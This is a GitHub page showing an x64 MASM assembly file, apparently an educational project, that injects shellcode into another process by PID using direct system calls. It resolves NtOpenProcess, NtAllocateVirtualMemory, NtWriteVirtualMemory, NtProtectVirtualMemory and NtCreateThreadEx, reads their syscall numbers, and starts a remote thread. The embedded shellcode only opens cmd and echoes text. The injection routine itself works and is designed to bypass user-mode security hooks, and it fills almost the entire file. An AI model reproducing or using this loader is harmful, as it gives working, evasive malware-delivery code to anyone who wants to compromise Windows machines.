-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmain.asm
275 lines (225 loc) · 7.19 KB
/
main.asm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
; /*
;
; @author: 0xbekoo
; @Project: Direct Systemcall with MASM64 Assembly
; @Last Update: 2024-12-18
;
; @Warning: This project is for educational purposes only. If you use this project for illegal purposes, it is your responsibility.
;
; */
include utils.inc
include syscalls.inc
.const
; Make sure you enter the PID
PID DW 0
ALL_ACCESS equ 1FFFFFh
PAGE_EXECUTE_READWRITE equ 40h
MEM_COMMIT_RESERVE equ 3000h
PAGE_EXECUTE_READ equ 20h
.data
ShellcodeSize QWORD 0
OldProtect dd 0
.code
; /*
; cmd /K "echo Direct Syscalls with masm64"
; */
Shellcode BYTE 0fch, 048h, 083h, 0e4h, 0f0h, 0e8h, 0c0h, 000h, 000h, 000h, 041h, 051h, 041h, 050h, 052h
BYTE 051h, 056h, 048h, 031h, 0d2h, 065h, 048h, 08bh, 052h, 060h, 048h, 08bh, 052h, 018h, 048h
BYTE 08bh, 052h, 020h, 048h, 08bh, 072h, 050h, 048h, 00fh, 0b7h, 04ah, 04ah, 04dh, 031h, 0c9h
BYTE 048h, 031h, 0c0h, 0ach, 03ch, 061h, 07ch, 002h, 02ch, 020h, 041h, 0c1h, 0c9h, 00dh, 041h
BYTE 001h, 0c1h, 0e2h, 0edh, 052h, 041h, 051h, 048h, 08bh, 052h, 020h, 08bh, 042h, 03ch, 048h
BYTE 001h, 0d0h, 08bh, 080h, 088h, 000h, 000h, 000h, 048h, 085h, 0c0h, 074h, 067h, 048h, 001h
BYTE 0d0h, 050h, 08bh, 048h, 018h, 044h, 08bh, 040h, 020h, 049h, 001h, 0d0h, 0e3h, 056h, 048h
BYTE 0ffh, 0c9h, 041h, 08bh, 034h, 088h, 048h, 001h, 0d6h, 04dh, 031h, 0c9h, 048h, 031h, 0c0h
BYTE 0ach, 041h, 0c1h, 0c9h, 00dh, 041h, 001h, 0c1h, 038h, 0e0h, 075h, 0f1h, 04ch, 003h, 04ch
BYTE 024h, 008h, 045h, 039h, 0d1h, 075h, 0d8h, 058h, 044h, 08bh, 040h, 024h, 049h, 001h, 0d0h
BYTE 066h, 041h, 08bh, 00ch, 048h, 044h, 08bh, 040h, 01ch, 049h, 001h, 0d0h, 041h, 08bh, 004h
BYTE 088h, 048h, 001h, 0d0h, 041h, 058h, 041h, 058h, 05eh, 059h, 05ah, 041h, 058h, 041h, 059h
BYTE 041h, 05ah, 048h, 083h, 0ech, 020h, 041h, 052h, 0ffh, 0e0h, 058h, 041h, 059h, 05ah, 048h
BYTE 08bh, 012h, 0e9h, 057h, 0ffh, 0ffh, 0ffh, 05dh, 048h, 0bah, 001h, 000h, 000h, 000h, 000h
BYTE 000h, 000h, 000h, 048h, 08dh, 08dh, 001h, 001h, 000h, 000h, 041h, 0bah, 031h, 08bh, 06fh
BYTE 087h, 0ffh, 0d5h, 0bbh, 0f0h, 0b5h, 0a2h, 056h, 041h, 0bah, 0a6h, 095h, 0bdh, 09dh, 0ffh
BYTE 0d5h, 048h, 083h, 0c4h, 028h, 03ch, 006h, 07ch, 00ah, 080h, 0fbh, 0e0h, 075h, 005h, 0bbh
BYTE 047h, 013h, 072h, 06fh, 06ah, 000h, 059h, 041h, 089h, 0dah, 0ffh, 0d5h, 063h, 06dh, 064h
BYTE 02eh, 065h, 078h, 065h, 020h, 02fh, 04bh, 020h, 022h, 065h, 063h, 068h, 06fh, 020h, 044h
BYTE 069h, 072h, 065h, 063h, 074h, 020h, 053h, 079h, 073h, 063h, 061h, 06ch, 06ch, 073h, 020h
BYTE 077h, 069h, 074h, 068h, 020h, 06dh, 061h, 073h, 06dh, 036h, 034h, 000h
mainCRTStartup PROC
mov ecx,dword ptr [PID]
cmp ecx,0
jz Exit
; Prepare the Structures
call PrepareStructures
; Get the Address of NTDLL
sub rsp,38h
lea rcx,[NTDLLString]
call GetModuleHandleA
add rsp,38h
lea rdx,[NTDLLAddress]
mov rcx,rax
call CheckFunctionResult
; Get the Address of NtOpenProcess
lea rdx,[NtOpenProcessString]
mov rcx,NTDLLAddress
call GetSpecificFunction
xor rdx,rdx
mov rcx,rax
call CheckFunctionResult
; Get SSN for the NtOpenProcess
mov rcx,rax
call GetSSN
; Call NtOpenProcess
sub rsp,38h
lea r9,CID
lea r8,ObjAttr
mov edx,ALL_ACCESS
lea rcx,HandleProcess
call My_pNtOpenProcess
add rsp,38h
cmp rax,0
jnz Exit
; Get the Address of NtAllocateVirtualMemory
lea rdx,[NtAllocateVirtualString]
mov rcx,NTDLLAddress
call GetSpecificFunction
xor rdx,rdx
mov rcx,rax
call CheckFunctionResult
; Get SSN for the NtAllocateVirtualMemory
mov rcx,rax
call GetSSN
; Call NtAllocateVirtualMemory
mov rcx,sizeof Shellcode
mov ShellcodeSize,rcx
; Call NtAllocateVirtualMemory
sub rsp,38h
mov dword ptr [rsp+28h],PAGE_EXECUTE_READWRITE
mov dword ptr [rsp+20h],MEM_COMMIT_RESERVE
lea r9,ShellcodeSize
xor r8d,r8d
lea rdx,RemoteBuffer
mov rcx,HandleProcess
call My_pNtAllocateVirtualMemory
add rsp,38h
cmp rax,0
jnz Exit
; Get the Address of NtWriteVirtualMemory
lea rdx,[NtWriteVirtualString]
mov rcx,NTDLLAddress
call GetSpecificFunction
xor rdx,rdx
mov rcx,rax
call CheckFunctionResult
; Get SSN for the NtWriteVirtualMemory
mov rcx,rax
call GetSSN
; Call NtWriteVirtualMemory
sub rsp,38h
mov qword ptr [rsp + 20h],0
mov r9,ShellcodeSize
lea r8,Shellcode
mov rdx,RemoteBuffer
mov rcx,HandleProcess
call My_pNtWriteVirtualMemory
add rsp,38h
cmp rax,0
jnz Exit
; Get the Address of NtProtectVirtualMemory
lea rdx,[NtProtectVirtualString]
mov rcx,NTDLLAddress
call GetSpecificFunction
xor rdx,rdx
mov rcx,rax
call CheckFunctionResult
; Get SSN for the NtProtectVirtualMemory
mov rcx,rax
call GetSSN
; Call NtProtectVirtualMemory
sub rsp,38h
lea rcx,OldProtect
mov qword ptr [rsp + 20h],rcx
mov r9d,PAGE_EXECUTE_READ
lea r8,ShellcodeSize
lea rdx,[RemoteBuffer]
mov rcx,HandleProcess
call My_pNtProtectVirtualMemory
add rsp,38h
cmp rax,0
jnz Exit
; Get the Address of NtCreateThreadEx
lea rdx,[NtCreateThreadString]
mov rcx,NTDLLAddress
call GetSpecificFunction
xor rdx,rdx
mov rcx,rax
call CheckFunctionResult
; Get SSN for the NtCreateThreadEx
mov rcx,rax
call GetSSN
; Call NtCreateThreadEx
mov r10,RemoteBuffer
sub rsp,38h
mov qword ptr [rsp + 50h],0
mov qword ptr [rsp + 48h],0
mov qword ptr [rsp + 40h],0
mov qword ptr [rsp + 38h],0
mov qword ptr [rsp + 30h],0
mov qword ptr [rsp + 28h],0
mov qword ptr [rsp + 20h],r10
mov r9,HandleProcess
lea r8,ObjAttr
mov edx,ALL_ACCESS
lea rcx,HandleThread
call My_pNtCreateThreadEx
add rsp,38h
cmp rax,0
jnz Exit
; Get the Address of NtWaitForSingleObject
lea rdx,[NtWaitString]
mov rcx,NTDLLAddress
call GetSpecificFunction
xor rdx,rdx
mov rcx,rax
call CheckFunctionResult
; Get SSN for the NtWaitForSingleObject
mov rcx,rax
call GetSSN
; Call NtWaitForSingleObject
sub rsp,38h
mov r8,0
xor rdx,rdx
mov rcx,HandleThread
call My_pNtWaitForSingleObject
add rsp,38h
Exit:
mov rdx,HandleProcess
mov rcx,HandleThread
jmp ExitProgram
mainCRTStartup ENDP
PrepareStructures PROC
mov CID.UniqueProcess,ecx
mov CID.UniqueThread,0
mov ObjAttr.oLength,0
mov ObjAttr.RootDirectory,0
mov ObjAttr.ObjectName,0
mov ObjAttr.Attributes,0
mov ObjAttr.SecurityDescriptor,0
mov ObjAttr.SecurityQualityOfService,0
mov ObjAttr.oLength,sizeof OBJECT_ATTRIBUTES
ret
PrepareStructures ENDP
; /*
; * Parameters:
; * rcx - The address of Function (QWORD)
;
; Output:
; * rax - The Target Function's SSN Number
GetSSN PROC
mov r10,rcx
xor rax,rax
mov eax,1
imul rax,rax,0
movzx eax,byte ptr [r10+rax+4]
ret
GetSSN ENDP
END